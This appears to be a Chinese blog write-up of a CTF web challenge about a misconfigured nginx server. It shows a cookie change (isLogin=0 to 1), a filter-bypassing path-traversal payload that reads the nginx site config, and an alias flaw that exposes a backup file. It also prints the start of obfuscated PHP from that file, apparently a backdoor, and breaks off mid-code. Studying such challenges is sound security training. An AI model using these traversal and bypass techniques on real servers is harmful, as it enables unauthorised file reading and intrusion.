攻防世界Web：Web_php_wrong_nginx_config

最新推荐文章于 2024-04-04 19:56:01 发布

dofd

最新推荐文章于 2024-04-04 19:56:01 发布

阅读量2k

点赞数

分类专栏： CTF 文章标签： nginx 前端 php

本文链接：https://blog.csdn.net/Light_inthe_eyes/article/details/121129302

版权

本文介绍了通过御剑扫描工具发现的Web安全问题，涉及登录页面、robots.txt隐藏文件、PHP混淆及Nginx配置漏洞。通过分析Hack.php和hint.php，成功绕过过滤并访问敏感文件，揭示了PHP混淆代码审计的过程，最终利用脚本获取flag，强调了提升代码能力的重要性。

摘要由CSDN通过智能技术生成

首先进来是一个登录页面：
在这里插入图片描述通过御剑扫描，发现了robots.txt，打开发现两个php文件：
hint.php：
Hack.php是跳转到登录页面：
抓包看看Hack.php，发现了可疑的点Cookie：isLogin=0，不妨修改为1，进入控制中心：
发现url中file=index&ext=php，不妨测试一下../，发现这里过滤了../：
在这里插入图片描述绕过../，根据hint.php可以知道配置文件的路径，那就构造payload：file=....//....//....//....//etc/nginx/sites-enabled/site.conf&ext=，读取

server {
   
    listen 8080; ## listen for ipv4; this line is default and implied
    listen [::]:8080; ## listen for ipv6

    root /var/www/html;
    index index.php index.html index.htm;
    port_in_redirect off;
    server_name _;

    # Make site accessible from http://localhost/
    #server_name localhost;

    # If block for setting the time for the logfile
    if ($time_iso8601 ~ "^(\d{4})-(\d{2})-(\d{2})") {
   
       set $year $1;
       set $month $2;
       set $day $3;
    }
    # Disable sendfile as per https://docs.vagrantup.com/v2/synced-folders/virtualbox.html
    sendfile off;

        set $http_x_forwarded_for_filt $http_x_forwarded_for;
        if ($http_x_forwarded_for_filt ~ ([0-9]+\.[0-9]+\.[0-9]+\.)[0-9]+) {
   
                set $http_x_forwarded_for_filt $1???;
        }

    # Add stdout logging

    access_log /var/log/nginx/$hostname-access-$year-$month-$day.log openshift_log;
    error_log /var/log/nginx/error.log info;

    location / {
   
        # First attempt to serve request as file, then
        # as directory, then fall back to index.html
        try_files $uri $uri/ /index.php?q=$uri&$args;
        server_tokens off;
    }

    #error_page 404 /404.html;

    # redirect server error pages to the static page /50x.html
    #
    error_page 500 502 503 504 /50x.html;
    location = /50x.html {
   
        root /usr/share/nginx/html;
    }
    location ~ \.php$ {
   
        try_files $uri $uri/ /index.php?q=$uri&$args;
        fastcgi_split_path_info ^(.+\.php)(/.+)$;
        fastcgi_pass unix:/var/run/php/php5.6-fpm.sock;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param SCRIPT_NAME $fastcgi_script_name;
        fastcgi_index index.php;
        include fastcgi_params;
        fastcgi_param REMOTE_ADDR $http_x_forwarded_for;
    }

    location ~ /\. {
   
            log_not_found off;
            deny all;
    }
    location /web-img {
   
        alias /images/;
        autoindex on;
    }
    location ~* \.(ini|docx|pcapng|doc)$ {
     
         deny all;  
    }  

    include /var/www/nginx[.]conf;
}

代码审计，关键词alias：用来指定请求资源的真实路径，访问web-img：
在这里插入图片描述找到敏感文件：/var/www/hack.php.bak：
根据经验，这应该是一个PHP混淆，输出$f看看：
整理代码：

<?php
        $kh="42f4";
        $kf="e9ac";
        function x($t,$k){
   
            $c=strlen($k);
            $l=strlen($t);
            $o="";
            for($i=0;$i